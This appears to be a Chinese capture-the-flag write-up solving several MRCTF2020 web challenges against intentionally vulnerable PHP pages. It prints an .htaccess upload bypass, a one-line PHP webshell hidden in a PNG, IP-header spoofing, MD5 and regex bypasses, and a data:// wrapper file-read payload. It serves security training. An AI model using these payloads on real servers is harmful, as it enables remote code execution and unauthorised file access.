[MRCTF2020]你传你🐎呢
打开上传,不能上传php文件,但是可以上传png图片,于是利用.htaccess文件将图片解析为php
.htaccess:
<FilesMatch "shell">
SetHandler application/x-httpd-php
</FilesMatch>
上传.htaccess文件时抓包修改Content-Type: image/png即可绕过上传限制,再上传图片马shell.png,蚁剑连上在根目录读取flag
shell.png:
<?php eval($_POST['pass']);?>
[MRCTF2020]Ez_bypass
I put something in F12 for you
include 'flag.php';
$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';
if(isset($_GET['gg'])&&isset($_GET['id'])) {
$id=$_GET['id'];
$gg=$_GET['gg'];
if (md5($id) === md5($gg) && $id !== $gg) {
echo 'You got the first step';
if(isset($_POST['passwd'])) {
$passwd=$_POST['passwd'];
if (!is_numeric($passwd))
{
if($passwd==1234567)
{
echo 'Good Job!';
highlight_file('flag.php');
die('By Retr_0');
}
else
{
echo "can you think twice??";
}
}
else{
echo 'You can not get it !';
}
}
else{
die('only one way to get the flag');
}
}
else {
echo "You are not a real hacker!";
}
}
else{
die('Please input first');
}
}Please input first
http://318d1d68-eac7-487a-ab2a-a546b157e042.node3.buuoj.cn/?gg[]=1&id[]=2
POST:passwd=1234567x
[MRCTF2020]PYWebsite
打开看源码,有提示:flag.php
根据提示我自己可以看到flag,添加X-Forwarded-For:127.0.0.1访问得到flag
[MRCTF2020]Ezpop
参考:https://blog.csdn.net/weixin_43952190/article/details/106016260
[MRCTF2020]套娃
查看源码有注释:
$query = $_SERVER['QUERY_STRING'];
if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
die('Y0u are So cutE!');
}
if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
echo "you are going to the next ~";
}
_可以用%20代替下划线从而绕过第一个if
参考文章:https://www.freebuf.com/articles/web/213359.html
第二个if中正则匹配表示匹配字符串的开头和结尾
由于在字符串中换行可以表示字符串的结尾,所以可以用%0a(换行符的url编码)绕过
payload: ?b%20u%20p%20t=23333%0a
得到提示:FLAG is in secrettw.php
打开查看源代码,明显的jsfuck编码,
在浏览器控制台里执行,得到下一步提示:post me Merak
post提交任意数据,得到源码:
<?php
error_reporting(0);
include 'takeip.php';
ini_set('open_basedir','.');
include 'flag.php';
if(isset($_POST['Merak'])){
highlight_file(__FILE__);
die();
}
function change($v){
$v = base64_decode($v);
$re = '';
for($i=0;$i<strlen($v);$i++){
$re .= chr ( ord ($v[$i]) + $i*2 );
}
return $re;
}
echo 'Local access only!'."<br/>";
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission! Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file']));
}
?>
ip用client-ip:127.0.0.1绕过,
2333参数用伪协议data:text/plain,todat is a happy day
file是我们要读取的文件的参数名,但经过了change函数转化,写个脚本反写:
<?php
function unchange($v){
$re = '';
for($i=0;$i<strlen($v);$i++){
$re .= chr ( ord ($v[$i]) - $i*2 );
}
return $re;
}
$real_flag = unchange('flag.php');
echo base64_encode($real_flag);
?>
输出:ZmpdYSZmXGI=
最终payload:
/secrettw.php?2333=data:text/plain,todat is a happy day&file=ZmpdYSZmXGI=
POST: client-ip:127.0.0.1
源码中看到flag
[MRCTF2020]Ezaudit
参考:https://blog.csdn.net/qq_40519543/article/details/107481525
[MRCTF2020]Ezpop_Revenge
参考:https://blog.csdn.net/a3320315/article/details/105215741/
[MRCTF2020]Not So Web Application
好家伙,web上搞c++,不是人做的
参考:https://www.ctfwp.com/%E5%AE%98%E6%96%B9%E8%B5%9B%E4%BA%8B%E9%A2%98/2020MRCTF#toc-heading-10
